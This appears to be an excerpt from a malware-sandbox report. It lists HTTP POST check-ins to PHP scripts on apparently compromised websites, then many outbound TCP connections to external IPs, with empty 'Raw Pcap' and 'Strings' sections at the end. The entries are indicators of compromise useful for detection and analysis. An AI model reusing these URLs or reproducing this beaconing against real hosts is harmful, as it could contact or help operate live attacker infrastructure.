User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayspro.com/css/fonts/ap4.php?v=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?r=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://g6securitysystems.com/js/ap4.php?t=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://freepolyclinic.com/gallery/small/ap1.php?p=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dulichmuadong.com/wp-includes/fonts/ap2.php?k=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?b=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1035 ➝ 50.63.90.1:80
Flows TCP192.168.1.1:1036 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1037 ➝ 46.252.201.1:80
Flows TCP192.168.1.1:1038 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1039 ➝ 50.62.160.231:80
Flows TCP192.168.1.1:1040 ➝ 173.201.1.1:80
Flows TCP192.168.1.1:1041 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1042 ➝ 66.36.163.207:80
Flows TCP192.168.1.1:1043 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1044 ➝ 66.33.213.135:80
Flows TCP192.168.1.1:1045 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1046 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1047 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1048 ➝ 186.202.153.84:80
Flows TCP192.168.1.1:1049 ➝ 23.229.143.32:80
Flows TCP192.168.1.1:1050 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1051 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1052 ➝ 23.229.183.231:80
Flows TCP192.168.1.1:1053 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1054 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1055 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1056 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1057 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1058 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1059 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1060 ➝ 217.174.149.3:80
Flows TCP192.168.1.1:1061 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1062 ➝ 23.229.209.230:80
Flows TCP192.168.1.1:1063 ➝ 192.254.189.83:80
Flows TCP192.168.1.1:1064 ➝ 95.110.202.149:80
Flows TCP192.168.1.1:1065 ➝ 103.21.58.231:80
Flows TCP192.168.1.1:1066 ➝ 107.180.2.132:80
Flows TCP192.168.1.1:1067 ➝ 107.180.1.233:80
Flows TCP192.168.1.1:1068 ➝ 97.74.215.85:80
Flows TCP192.168.1.1:1069 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1070 ➝ 23.229.142.166:80
Flows TCP192.168.1.1:1071 ➝ 166.62.12.1:80
Flows TCP192.168.1.1:1072 ➝ 50.63.202.57:80
Flows TCP192.168.1.1:1073 ➝ 173.254.28.111:80
Flows TCP192.168.1.1:1074 ➝ 157.7.144.5:80
Flows TCP192.168.1.1:1075 ➝ 182.50.135.128:80
Flows TCP192.168.1.1:1076 ➝ 85.92.75.157:80
Flows TCP192.168.1.1:1077 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1078 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1079 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1080 ➝ 184.168.25.1:80
Flows TCP192.168.1.1:1081 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1082 ➝ 166.62.28.84:80
Flows TCP192.168.1.1:1083 ➝ 182.50.134.1:80
Flows TCP192.168.1.1:1084 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1085 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1086 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1087 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1088 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1089 ➝ 50.63.90.1:80
Flows TCP192.168.1.1:1090 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1091 ➝ 46.252.201.1:80
Flows TCP192.168.1.1:1092 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1093 ➝ 50.62.160.231:80
Flows TCP192.168.1.1:1094 ➝ 173.201.1.1:80
Flows TCP192.168.1.1:1095 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1096 ➝ 66.36.163.207:80
Flows TCP192.168.1.1:1097 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1098 ➝ 66.33.213.135:80
Flows TCP192.168.1.1:1099 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1100 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1101 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1102 ➝ 186.202.153.84:80
Flows TCP192.168.1.1:1103 ➝ 23.229.143.32:80
Flows TCP192.168.1.1:1104 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1105 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1106 ➝ 23.229.183.231:80
Flows TCP192.168.1.1:1107 ➝ 52.88.9.255:80
Flows TCP192.168.1.1:1108 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1109 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1110 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1111 ➝ 68.178.254.208:80
Flows TCP192.168.1.1:1112 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1113 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1114 ➝ 217.174.149.3:80
Flows TCP192.168.1.1:1115 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1116 ➝ 23.229.209.230:80
Flows TCP192.168.1.1:1117 ➝ 192.254.189.83:80
Flows TCP192.168.1.1:1118 ➝ 95.110.202.149:80
Flows TCP192.168.1.1:1119 ➝ 103.21.58.231:80
Flows TCP192.168.1.1:1120 ➝ 107.180.2.132:80
Flows TCP192.168.1.1:1121 ➝ 107.180.1.233:80
Flows TCP192.168.1.1:1122 ➝ 97.74.215.85:80
Flows TCP192.168.1.1:1123 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1124 ➝ 23.229.142.166:80
Flows TCP192.168.1.1:1125 ➝ 166.62.12.1:80
Flows TCP192.168.1.1:1126 ➝ 50.63.202.57:80
Flows TCP192.168.1.1:1127 ➝ 173.254.28.111:80
Flows TCP192.168.1.1:1128 ➝ 157.7.144.5:80
Flows TCP192.168.1.1:1129 ➝ 182.50.135.128:80
Flows TCP192.168.1.1:1130 ➝ 85.92.75.157:80
Flows TCP192.168.1.1:1131 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1132 ➝ 192.232.249.212:80
Flows TCP192.168.1.1:1133 ➝ 74.124.204.146:80
Flows TCP192.168.1.1:1134 ➝ 184.168.25.1:80
Flows TCP192.168.1.1:1135 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1136 ➝ 166.62.28.84:80
Flows TCP192.168.1.1:1137 ➝ 182.50.134.1:80
Flows TCP192.168.1.1:1138 ➝ 192.186.222.229:80

Raw Pcap

Strings